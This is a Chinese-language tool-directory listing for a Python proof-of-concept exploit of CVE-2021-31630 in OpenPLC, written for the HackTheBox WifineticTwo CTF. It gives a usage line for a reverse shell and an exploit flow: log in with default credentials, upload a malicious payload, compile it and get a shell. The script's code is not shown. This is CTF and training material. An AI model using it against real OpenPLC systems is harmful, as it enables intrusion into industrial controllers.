Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
htb-wifinetictwo-exploit — 一个简单的Python脚本,用于在HTB WifineticTwo CTF上利用CVE-2021-31630 | Kitploit
工具/GitHubGitHub/behindsecurity/htb-wifinetictwo-exploit
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用CTF学习与教育远程访问工具二进制利用
GitHub

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
behindsecurity/htb-wifinetictwo-exploit

htb-wifinetictwo-exploit

一个简单的Python脚本,用于在HTB WifineticTwo CTF上利用CVE-2021-31630

查看仓库
2年前尚未审核

CVE-2021-31630 漏洞利用 PoC

此 Python 脚本是 CVE-2021-31630 的概念验证(PoC)漏洞利用代码,针对 HackTheBox 平台上 WifineticTwo 主机中运行的 OpenPLC 漏洞。它仅用于教育目的,旨在受控环境中演示漏洞利用过程。

免责声明

此工具仅供安全研究和教育目的使用。未经事先双方同意,使用此工具攻击目标属于违法行为。开发者不对滥用此漏洞利用代码的用户所造成的任何损失或刑事指控承担责任。

前置条件

在运行此漏洞利用代码之前,请确保你具备以下条件:

  • 系统上安装了 Python 3。
  • 已安装 requests 库。你可以使用 pip install requests 安装它。

使用方法

要使用此漏洞利用代码,你必须指定目标的 URL、本地主机 IP(LHOST)以及反向 shell 回连的本地端口(LPORT)。如果 OpenPLC 的用户名和密码与默认值不同,你也可以选择指定它们。

root@kitploit:~
./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]

参数

  • --target - 目标基础地址。示例:http://wifinetictwo.htb:8080
  • --lhost - 反向 shell 回连的本地主机 IP 地址。
  • --lport - 反向 shell 回连的本地端口。
  • --usr - (可选)OpenPLC 的用户名。默认为 openplc。
  • --pwd - (可选)OpenPLC 的密码。默认为 openplc。

功能特性

  • 使用提供的凭据自动处理登录过程。
  • 构造并上传恶意负载以实现远程代码执行。
  • 启动反向 shell,回连到攻击者指定的 IP 和端口。

漏洞利用流程

  1. 登录:脚本使用提供的凭据登录 OpenPLC 应用程序。
  2. 负载构造:动态构造一个旨在启动反向 shell 的恶意负载。
  3. 负载上传:将构造好的负载上传到服务器。
  4. 触发漏洞利用:通过尝试编译上传的恶意代码来触发漏洞,最终获得反向 shell。

致谢

  • 特别感谢发现并报告 CVE-2021-31630 的 Fellipe Oliveira。
  • 感谢 HackTheBox 提供了一个真实的环境,用于练习和学习网络安全。
下载工具